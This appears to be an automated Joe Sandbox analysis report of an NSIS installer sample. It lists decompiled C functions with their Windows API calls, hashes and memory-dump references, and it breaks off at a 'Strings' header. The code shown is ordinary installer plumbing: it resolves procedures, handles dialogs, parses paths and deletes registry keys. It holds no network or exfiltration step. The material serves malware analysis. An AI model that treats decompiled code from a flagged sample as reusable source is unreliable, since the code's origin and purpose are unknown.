Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp$C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll
API String ID: 3109718747-876136254
Opcode ID: 4caddf9fd98015af0c89a896aabe676fd06aff106387eddf506ca1aab1ee46e7
Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
Opcode Fuzzy Hash: 4caddf9fd98015af0c89a896aabe676fd06aff106387eddf506ca1aab1ee46e7
Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E

Uniqueness

Uniqueness Score: -1.00%

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x10001619
0x10001625
0x10001632
0x10001639
0x10001642
0x1000164e

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000000.00000002.1615522469.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1615494568.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615549663.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615572232.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_64Tgzu2FKh.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D57() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
				GetClientRect(_t25, _t27 - 0x58);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d63
0x00401d6a
0x00401d99
0x00401da1
0x00401da8
0x00401da8
0x00402ac2
0x00402ace

APIs

GetDlgItem.USER32(?,?), ref: 00401D5D
GetClientRect.USER32(00000000,?), ref: 00401D6A
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
DeleteObject.GDI32(00000000), ref: 00401DA8

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 111346f9e6b971423f1b2999124cafe5a37e4e10baee3c5636334ddbed451260
Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
Opcode Fuzzy Hash: 111346f9e6b971423f1b2999124cafe5a37e4e10baee3c5636334ddbed451260
Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78

Uniqueness

Uniqueness Score: -1.00%

Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C15(3);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C15(4);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C37(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C37();
					_t32 = E00402C37();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402C15();
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t41 = E00402C15(2);
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E00406193();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c19
0x00401c1b
0x00401c22
0x00401c25
0x00401c28
0x00401c32
0x00401c36
0x00401c39
0x00401c42
0x00401c42
0x00401c45
0x00401c49
0x00401c52
0x00401c52
0x00401c55
0x00401c59
0x00401c5b
0x00401cb0
0x00401cb2
0x00401cbd
0x00401cc7
0x00401cca
0x00401cca
0x00401cd3
0x00000000
0x00401c5d
0x00401c64
0x00401c66
0x00401c69
0x00401c6f
0x00401c76
0x00401c79
0x00401ca1
0x00401cd9
0x00401cd9
0x00401c7b
0x00401c89
0x00401c91
0x00401c94
0x00401c94
0x00401c79
0x00401cdc
0x00401cdf
0x00401ce5
0x00402a65
0x00402a65
0x00402ac2
0x00402ace

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1

Strings

!, xrefs: 00401C55

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405BC8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BC8(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405B4A(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}

0x00405bd1
0x00405bd8
0x00405bdb
0x00405bdd
0x00405be3
0x00405bfb
0x00405c1d
0x00000000
0x00405c03
0x00405c05
0x00405c06
0x00405c09
0x00405c0a
0x00405c13
0x00000000
0x00000000
0x00405c16
0x00405c19
0x00000000
0x00000000
0x00000000
0x00405c19
0x00000000
0x00405c06
0x00405bf2
0x00000000
0x00405bf3

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,?,00405C3C,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,?,?,75333420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75333420,00000000), ref: 00405BD6
CharNextW.USER32(00000000), ref: 00405BDB
CharNextW.USER32(00000000), ref: 00405BF3

Strings

C:\Users\user\AppData\Local\Temp\nseEF5D.tmp, xrefs: 00405BC9

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp
API String ID: 3213498283-3545633897
Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction ID: 71fcaf91f17ad0c61ae46c06a49b7004919c5bb89cc9bf949e59d58efb239cdc
Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction Fuzzy Hash: EAF09061914B2195EA3176544C45E7766BCEB96760B00807BE702B72C0EBB8A8C19FEE

Uniqueness

Uniqueness Score: -1.00%

Function 00405B1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405B1D(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405b1e
0x00405b2b
0x00405b2c
0x00405b37
0x00405b3f
0x00405b3f
0x00405b47

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75333420,00403589,?,00000006,00000008,0000000A), ref: 00405B23
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75333420,00403589,?,00000006,00000008,0000000A), ref: 00405B2D
lstrcatW.KERNEL32(?,0040A014), ref: 00405B3F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD

Uniqueness

Uniqueness Score: -1.00%

Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				short _v532;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E004060B9(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E00406626(3);
					if(_t28 == 0) {
						return RegDeleteKeyW(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}

0x00402d35
0x00402d3e
0x00402d47
0x00402d53
0x00402d5a
0x00402d7e
0x00402d64
0x00402d66
0x00402db9
0x00000000
0x00402dc1
0x00402d75
0x00402d7a
0x00402d7c
0x00000000
0x00000000
0x00402d7c
0x00402d98
0x00402da0
0x00402da7
0x00000000
0x00402dca
0x00000000
0x00402db2
0x00402dd4

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
RegCloseKey.ADVAPI32(?), ref: 00402D98
RegCloseKey.ADVAPI32(?), ref: 00402DB9

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68

Uniqueness

Uniqueness Score: -1.00%

Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E5D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x418ea0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42a210;
						if(_t2 >  *0x42a210) {
							_t3 = CreateDialogParamW( *0x42a200, 0x6f, 0, E00402DD7, 0);
							 *0x418ea0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406662(0);
					}
				} else {
					_t6 =  *0x418ea0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x418ea0 = 0;
					return _t6;
				}
			}

0x00402e64
0x00402e7e
0x00402e84
0x00402e8e
0x00402e94
0x00402e9a
0x00402eab
0x00402eb4
0x00000000
0x00402eb9
0x00402ec0
0x00402e86
0x00402e8d
0x00402e8d
0x00402e66
0x00402e66
0x00402e6d
0x00402e70
0x00402e70
0x00402e76
0x00402e7d
0x00402e7d

APIs

DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
GetTickCount.KERNEL32 ref: 00402E8E
CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 00405C25 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405C25(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040624C(0x425ef0, _a4);
				_t21 = E00405BC8(0x425ef0);
				if(_t21 != 0) {
					E004064E0(_t21);
					if(( *0x42a21c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425ef0 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425ef0);
							_push(0x425ef0);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040658F();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405B69(0x425ef0);
								continue;
							} else {
								goto L1;
							}
						}
						E00405B1D();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405c31
0x00405c3c
0x00405c40
0x00405c47
0x00405c53
0x00405c63
0x00405c65
0x00405c7d
0x00405c7e
0x00405c85
0x00405c86
0x00000000
0x00000000
0x00405c69
0x00405c70
0x00405c78
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c70
0x00405c88
0x00000000
0x00405c9c
0x00405c55
0x00405c5b
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c5b
0x00405c42
0x00000000

APIs

Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259

Part of subcall function 00405BC8: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,?,00405C3C,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,?,?,75333420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75333420,00000000), ref: 00405BD6
Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,?,?,75333420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75333420,00000000), ref: 00405C7E
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,?,?,75333420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75333420), ref: 00405C8E

Strings

